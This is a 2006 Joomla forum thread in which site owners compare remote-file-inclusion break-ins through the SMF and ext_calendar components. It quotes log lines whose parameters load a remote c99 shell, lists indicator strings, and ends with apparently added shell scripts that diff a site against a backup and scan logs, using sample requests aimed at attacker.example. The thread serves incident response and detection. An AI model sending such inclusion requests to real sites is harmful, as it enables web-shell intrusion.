The Joomla! Forum ™

PostPosted: Mon Jul 10, 2006 12:01 pm
Joomla! Apprentice

Joined: Mon Aug 22, 2005 12:36 am
Posts: 7
I had a look here:

http://www.[ ** removed hacker's list (kudos) **]/component/option, ... no7/page,1

Because this person has hacked my site twice in the last 2 days. There seem to be a lot of Joomla/Mambo sites on the list of reported attacks of sites he's hacked, and I wondered if anyone has any idea how this guy is getting in. There must be a common component, module or mambot that he's using.

Does anyone have any ideas?


PostPosted: Mon Jul 10, 2006 12:07 pm
Joomla! Apprentice

Joined: Mon Jul 10, 2006 11:57 am
Posts: 5
We were also hacked by this guy ...

Are you running the phpBB component (1.2.4 RC5) on your Joomla! site?

Regards,

Mike


PostPosted: Mon Jul 10, 2006 12:19 pm
Joomla! Apprentice

Joined: Mon Aug 22, 2005 12:36 am
Posts: 7
Mike G. wrote:

We were also hacked by this guy ...

Are you running the phpBB component (1.2.4 RC5) on your Joomla! site?

Regards,

Mike


We used to have a phpBB forum but changed it to vBulletin about a year ago; there is still a phpBB component installed, though. My other half is the techie, and he did tell me at the weekend why we can't remove it, but I can't remember why right now. I went through all the components and modules that we don't need/use and removed them, as well as updating any others to the latest versions, etc., and my other half has tried changing settings to make it even more secure, but he still got to the site a second time. I'm just glad we take regular backups and save them elsewhere.


PostPosted: Mon Jul 10, 2006 12:28 pm
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1367
Location: New Orleans, LA, USA
@Maggles,

I have sent you a Personal Message.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


PostPosted: Mon Jul 10, 2006 12:30 pm
Joomla! Apprentice

Joined: Mon Aug 22, 2005 12:36 am
Posts: 7
RobS wrote:
@Maggles,

I have sent you a Personal Message.


Thanks, I've emailed you to the address you supplied.


PostPosted: Mon Jul 10, 2006 1:49 pm
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
Turk Telecom also for an attack through ext_calendar.
IP 81.215.180.206

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


PostPosted: Mon Jul 10, 2006 2:04 pm
Joomla! Apprentice

Joined: Mon Jul 10, 2006 11:57 am
Posts: 5
The attack on our site came from 81.213.180.37, also a Turkish site.

As I found in the logfiles, they used a PHP/BackDoor script, infecting the site through the phpBB download feature!!!

CAUTION! The script resides at this site: [mod edit: do not post links to viruses. link omitted - ChiefGoFor] and might become active if you follow the link; my virus scanner (McAfee) detected it in the browser.

Regards,

Mike


Last edited by ChiefGoFor on Mon Jul 10, 2006 2:25 pm, edited 1 time in total.

PostPosted: Mon Jul 10, 2006 2:13 pm
Joomla! Virtuoso

Joined: Fri Aug 19, 2005 8:46 am
Posts: 3011
Location: Stockholm, Sweden
Warning: the above link contains a trojan virus script, as advised by the poster.

_________________
Industributik - http://www.industributiken.se


Last edited by LorenzoG on Mon Jul 10, 2006 2:23 pm, edited 1 time in total.

PostPosted: Mon Jul 10, 2006 3:36 pm
Joomla! Apprentice

Joined: Mon Jul 10, 2006 11:57 am
Posts: 5
Hmm ... but it might be helpful for other users to know what to search for in their logfiles ....  :-\

So look for "eno7" or "c99.txt" in your logfiles to identify whether some of your modules have also been affected by this nasty script.

Regards,

Mike


PostPosted: Mon Jul 10, 2006 4:05 pm
Joomla! Champion

Joined: Tue Sep 13, 2005 12:22 am
Posts: 5279
Location: Omaha, Nebraska, USA
Mike G. wrote:

Hmm ... but it might be helpful for other users to know what to search for in their logfiles ....  :-\

So look for "eno7" or "c99.txt" in your logfiles to identify whether some of your modules have also been affected by this nasty script.


I agree with you. It was kind of a catch-22 there. Your solution of searching for those key terms is great! Thank you for the information.

_________________
Kenneth Crowder - Omaha, Nebraska, USA
Global Moderator - Joomla! ...because open source matters
Recipes for people with food allergies: http://intolerantoffspring.com
Author of "Joomla! 1.5: Developing Secure Sites": http://www.lynda.com/home/DisplayCourse.aspx?lpk2=73559


PostPosted: Mon Jul 10, 2006 4:11 pm
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1367
Location: New Orleans, LA, USA
Searching for "CONFIG_EXT", "mosConfig_absolute_path" and "mosConfig_live_site" will also reveal some of the recent exploit attempts.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Last edited by RobS on Tue Jul 11, 2006 1:07 am, edited 1 time in total.

PostPosted: Mon Jul 17, 2006 2:16 pm
Joomla! Intern

Joined: Sat Oct 15, 2005 7:07 pm
Posts: 51
Location: Ottawa
Our site also got hacked this weekend by this same Eno7 guy. His page overwrites your configuration.php file. How do we prevent this from happening again? This is a very serious issue. I am running the latest Joomla 1.0.10 and VirtueMart 1.0.6 along with SMF RC1.2. Is there some common denominator that allows this guy easy access to hack Joomla-powered sites? Everything in the root folder of our site is read-only, so how did this happen?

Thanks

_________________
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net


PostPosted: Mon Jul 17, 2006 2:26 pm
Joomla! Champion

Joined: Tue Sep 13, 2005 12:22 am
Posts: 5279
Location: Omaha, Nebraska, USA
To my knowledge, this is not a "Joomla" issue. It is an issue with the components not using some key Joomla security measures. I think in your case the culprit is SMF.

RobS knows more about it than I do, so I will let him give you a more formal answer.

_________________
Kenneth Crowder - Omaha, Nebraska, USA
Global Moderator - Joomla! ...because open source matters
Recipes for people with food allergies: http://intolerantoffspring.com
Author of "Joomla! 1.5: Developing Secure Sites": http://www.lynda.com/home/DisplayCourse.aspx?lpk2=73559


PostPosted: Mon Jul 17, 2006 2:38 pm
Joomla! Intern

Joined: Fri Sep 09, 2005 5:28 am
Posts: 57
What are the practical steps to restore the website? We've just been hacked through the SMF component:

85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=[EDITED by mod for security reasons]?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......

And then, what are the practical steps to prevent it from recurring?

Thank you

Anna

_________________
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org


Last edited by infograf768 on Mon Jul 17, 2006 2:49 pm, edited 1 time in total.

PostPosted: Mon Jul 17, 2006 2:45 pm
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
Concerning SMF
http://forum.joomla.org/index.php/topic,76520.0.html

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


PostPosted: Mon Jul 17, 2006 2:52 pm
Joomla! Intern

Joined: Fri Sep 09, 2005 5:28 am
Posts: 57
Thank you

Anna

_________________
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org


PostPosted: Mon Jul 17, 2006 3:32 pm
Joomla! Intern

Joined: Sat Oct 15, 2005 7:07 pm
Posts: 51
Location: Ottawa
Thanks...

One question... will that fix prevent this clown from doing this again?

_________________
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net


PostPosted: Mon Jul 24, 2006 9:22 am
Joomla! Apprentice

Joined: Tue Aug 30, 2005 1:19 pm
Posts: 10
Location: Hamburg
CiPHeR wrote:
One question... will that fix prevent this clown from doing this again?


I'd love to know that!
Anybody?  :-*


PostPosted: Mon Jul 24, 2006 3:57 pm
Joomla! Apprentice

Joined: Sun Jul 09, 2006 10:41 am
Posts: 17
Block the IP in the .htaccess file:

deny from xxx.xxx.xxx.xxx

(if it comes from the same place), or disable the component and upgrade :)


PostPosted: Mon Jul 24, 2006 5:42 pm
Joomla! Explorer

Joined: Thu Aug 18, 2005 8:54 pm
Posts: 374
zomertje wrote:
Block the IP in the .htaccess file:

deny from xxx.xxx.xxx.xxx


That won't help, since it is a dynamic IP of that provider, who is known to support or at least not do anything against hackers (its name is not allowed to be mentioned in these forums, otherwise you get flamed). The same computer may have another IP next time.

You would need to ban all IPs of that provider. In case you need them, PM me and I will send you the whole range.


PostPosted: Tue Jul 25, 2006 2:25 am
Joomla! Intern

Joined: Fri Sep 09, 2005 5:28 am
Posts: 57
CiPHeR wrote:
Thanks...

One question... will that fix prevent this clown from doing this again?


Yes, placing that one line in the insecure files prevented the hacker from gaining access to MY website despite literally hundreds of attempts from various IPs in various countries.

Additionally my Server Host turned global_registers to OFF as recommended.

Hope this works for you as well.

Anna

_________________
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org


PostPosted: Tue Jul 25, 2006 3:07 am
Joomla! Guru

Joined: Tue Jun 06, 2006 7:41 am
Posts: 828
Location: California, Germany, Norway
I had 7 sites hacked by someone with the same signature. Only three of these sites were Joomla sites. They defaced the index.php file and uploaded a file called "fix.php". If they did more I haven't found it yet.

What all the hacked sites have in common is that 1) they're all at one ISP and 2) they're all using PHP/MySQL.

It seems the exploit could be seeking out ANY poor PHP code, whether in a Joomla component or in any other script.

If Joomla pros would like log files or other details, contact me.

I'd also appreciate some help. Rebuilding seven sites is an intimidating task, especially since the way they're getting in doesn't appear to be clear yet.

_________________
Home: http://www.ronliskey.com
Business http://www.communitygrove.com


PostPosted: Tue Jul 25, 2006 5:28 am
Joomla! Guru

Joined: Tue Jun 06, 2006 7:41 am
Posts: 828
Location: California, Germany, Norway
Following the trail...

From the log files. Is this how they got in? What might this do?

85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"

_________________
Home: http://www.ronliskey.com
Business http://www.communitygrove.com


PostPosted: Tue Jul 25, 2006 6:39 am
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
Using the vulnerability in ext-calendar.
You should back up your DB, delete all your root files and reinstall Joomla and the proven, corrected components/add-ons.
This is the only way to be sure that all will be OK.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


PostPosted: Tue Jul 25, 2006 12:00 pm
Joomla! Intern

Joined: Sat Oct 15, 2005 7:07 pm
Posts: 51
Location: Ottawa
anna.y wrote:
CiPHeR wrote:
Thanks...

One question... will that fix prevent this clown from doing this again?


Yes, placing that one line in the insecure files prevented the hacker from gaining access to MY website despite literally hundreds of attempts from various IPs in various countries.

Additionally my Server Host turned global_registers to OFF as recommended.

Hope this works for you as well.

Anna



I don't know why all hosts DON'T have register_globals = OFF!

_________________
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net


PostPosted: Tue Jul 25, 2006 12:16 pm
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903
CiPHeR wrote:
I don't know why all hosts DON'T have register_globals = OFF!


register_globals is not, in itself, insecure - the problem is that globals are often relied upon by inexperienced developers who are unaware of the issues that can arise with globals if their code is not clean and secure. Because so many scripts rely on register_globals being on, hosts have been reluctant to turn them off (or keep them off if they are running PHP 4.2.0 or higher) - you can imagine the screams from customers if hosts suddenly disabled globals and people had their sites breaking all over the servers!
So, if people do not report to their hosts when sites get hacked, or don't ask their hosts to turn register_globals off, hosts will sit in blissful ignorance thinking their customers are happy with the settings the way they are.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


PostPosted: Tue Jul 25, 2006 4:56 pm
Joomla! Intern

Joined: Fri Sep 09, 2005 5:28 am
Posts: 57
infograf768 wrote:
Using the vulnerability in ext-calendar.
You should back up your DB, delete all your root files and reinstall Joomla and the proven, corrected components/add-ons.
This is the only way to be sure that all will be OK.


I got hacked through an older version of com_SMF, and deleting all root files and re-installing everything was NOT an option.

All I had to do, in addition to adding the recommended line, was check which files were removed or altered by the hacker (two) and simply get those two files from my site backup.

It was rather simple and, as I said, despite hundreds of hacking attempts I'm having no further problems (keeping my fingers crossed is probably helping as well...  ;))

Anna 

_________________
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org
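The check anna.y describes above (finding which files the intruder removed or altered, then restoring just those from backup) as an added shell example; this is not code from the thread or from the Joomla project. It assumes a known-good copy of the site root, a backup taken before the incident, and compares it file by file with the live root. The two directory trees it builds for the demonstration are constructed: one component file defaced, a dropped-in fix.php like the one rliskey found, and a deleted configuration.php.

```shell
#!/bin/sh
# Added example, not from the thread: list the files an intruder added, removed
# or altered by comparing the live site root with a known-good backup copy,
# the check described before restoring the affected files from backup.

# Usage: make_sample_trees DIR
# Builds a constructed "backup" tree and a "live" tree under DIR that differ
# the way the thread describes: one component file defaced, one file dropped
# in, one file deleted.
make_sample_trees() {
    base=$1
    mkdir -p "$base/backup/components/com_smf" "$base/live/components/com_smf"
    printf '<?php // index\n' > "$base/backup/index.php"
    printf '<?php // index\n' > "$base/live/index.php"                      # untouched
    printf '<?php // smf\n' > "$base/backup/components/com_smf/smf.php"
    printf '<?php // defaced\n' > "$base/live/components/com_smf/smf.php"   # altered
    printf '<?php // dropped in\n' > "$base/live/fix.php"                    # added
    printf '<?php // config\n' > "$base/backup/configuration.php"           # missing from live
}

# Usage: compare_trees BACKUP_DIR LIVE_DIR
# Prints one line per difference: "added", "removed" or "changed", then the
# path relative to the root. Paths present in both trees are compared byte
# for byte, so a defaced file is caught even when its name and size match.
compare_trees() {
    backup=$1; live=$2
    lb=$(mktemp); ll=$(mktemp)
    (cd "$backup" && find . -type f | sort) > "$lb"
    (cd "$live" && find . -type f | sort) > "$ll"
    comm -13 "$lb" "$ll" | sed 's/^/added   /'       # only in live
    comm -23 "$lb" "$ll" | sed 's/^/removed /'       # only in backup
    comm -12 "$lb" "$ll" | while IFS= read -r f; do  # in both: compare contents
        cmp -s "$backup/$f" "$live/$f" || echo "changed $f"
    done
    rm -f "$lb" "$ll"
}

# Stand-alone run: compare the two roots given as $1 and $2, or the sample.
if [ "$#" -eq 2 ]; then
    compare_trees "$1" "$2"
else
    demo=$(mktemp -d)
    make_sample_trees "$demo"
    compare_trees "$demo/backup" "$demo/live"
    rm -rf "$demo"
fi
```

Run it as `sh compare_roots.sh /path/to/backup /path/to/live`. Every "changed" and "removed" path is a candidate for restoring from the backup, and every "added" path is one to examine before deleting. The comparison is only as good as the baseline: a backup taken after the first intrusion already contains the intruder's files and will report nothing about them.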


PostPosted: Wed Aug 09, 2006 8:17 am
Joomla! Fledgling

Joined: Wed Aug 09, 2006 8:13 am
Posts: 3
How was he able to alter the MySQL DB?


PostPosted: Mon Aug 14, 2006 2:46 am
Joomla! Intern

Joined: Thu Sep 01, 2005 5:41 am
Posts: 76
rliskey wrote:
Following the trail...

From the log files. Is this how they got in? What might this do?

85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"



I was hacked by a Turkish hacker today.


Code:
[14-Aug-2006 07:20:22] PHP Warning:  main(http://mi.verizon.net.do/carlos18/therules25.dot): failed to open stream: HTTP request failed! HTTP/1.1 404 Object Not Found in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning:  main(): Failed opening 'http://mi.verizon.net.do/carlos18/therules25.dot' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning:  main(): Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 97

I don't know why it shows turx.nl. Is extcalendar the culprit?

_________________
The man who speaks to you of sacrifice speaks of slaves and masters. And intends to be the master. --Ayn Rand


PostPosted: Mon Aug 14, 2006 6:13 am
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
What you are posting looks like the error log and not the raw logs.

Download and open your raw logs in an editor to check for GET and "mosconfig" strings so as to figure out exactly where they got in.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group
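The log checks recommended in this thread (Mike G.'s "eno7" and "c99.txt", RobS's "CONFIG_EXT", "mosConfig_absolute_path" and "mosConfig_live_site", and infograf768's advice to search the raw access log rather than the error log for GET requests carrying "mosconfig") as one added shell script. It is not code from the thread or from the Joomla project. The log it scans is a constructed sample in Apache combined format, with 192.0.2.x addresses and the host attacker.example standing in for the real sources, and it also flags the general shape of the requests anna.y and rliskey posted: any query-string parameter set to a remote URL, whatever the parameter is called.

```shell
#!/bin/sh
# Added example, not from the thread: scan an Apache access log (combined
# format) for the indicator strings recommended in the thread and for the
# general shape of the quoted requests, a query-string parameter whose value
# is itself a remote URL.

# Usage: write_sample_log FILE
# Writes a constructed sample log. The client addresses (192.0.2.x) and the
# host attacker.example are placeholders, not real sources.
write_sample_log() {
    cat > "$1" <<'EOF'
192.0.2.10 - - [18/Jul/2006:10:14:18 -0400] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.0.2.20 - - [18/Jul/2006:10:14:19 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://attacker.example/images/c99.txt HTTP/1.0" 200 18278 "-" "Mozilla/4.0"
192.0.2.30 - - [18/Jul/2006:10:15:02 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://attacker.example/eno7.txt HTTP/1.1" 200 3879 "-" "Mozilla/5.0"
192.0.2.10 - - [18/Jul/2006:10:16:40 -0400] "GET /images/stories/logo.png HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
192.0.2.20 - - [18/Jul/2006:10:17:55 -0400] "GET /index.php?mosConfig_live_site=http://attacker.example/x.txt HTTP/1.1" 200 3300 "-" "Mozilla/4.0"
EOF
}

# Usage: find_indicators LOG
# Lines containing any of the strings named in the thread (case-insensitive).
find_indicators() {
    grep -i -E 'eno7|c99\.txt|CONFIG_EXT|mosConfig_absolute_path|mosConfig_live_site' "$1"
}

# Usage: find_remote_includes LOG
# Lines whose request sets some query-string parameter to a remote URL,
# whatever the parameter is called: this catches the same technique aimed at
# scripts and parameter names that are not on anyone's list yet.
find_remote_includes() {
    grep -E '"(GET|POST) [^ ]*[?][^ ]*=(https?|ftp)://' "$1"
}

# Usage: flagged_sources LOG
# Flagged requests per client address, busiest first.
flagged_sources() {
    find_remote_includes "$1" | awk '{ print $1 }' | sort | uniq -c | sort -rn
}

# Usage: flagged_scripts LOG
# Local scripts that received such requests (the path before the "?"), which
# points at the component to disable or upgrade.
flagged_scripts() {
    find_remote_includes "$1" | awk '{ split($7, p, "[?]"); print p[1] }' | sort | uniq -c | sort -rn
}

# Stand-alone run: scan the log given as $1, or the built-in sample.
LOG=${1:-}
if [ -z "$LOG" ]; then
    LOG=$(mktemp)
    write_sample_log "$LOG"
fi
echo "== indicator strings =="; find_indicators "$LOG"
echo "== parameters carrying a remote URL =="; find_remote_includes "$LOG"
echo "== sources =="; flagged_sources "$LOG"
echo "== targeted scripts =="; flagged_scripts "$LOG"
```

Run it with the path of a raw access log as its only argument (`sh scan_log.sh access_log`); without an argument it scans the built-in sample. The error log is the wrong file for this, as infograf768 notes: the PHP warnings quoted above show an include failing, but only the access log records the request that carried the URL and the address it came from. A 200 in the status column of a flagged line means the script answered the request, not that the include succeeded, so treat every hit as a reason to check the files, not as proof of compromise on its own.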

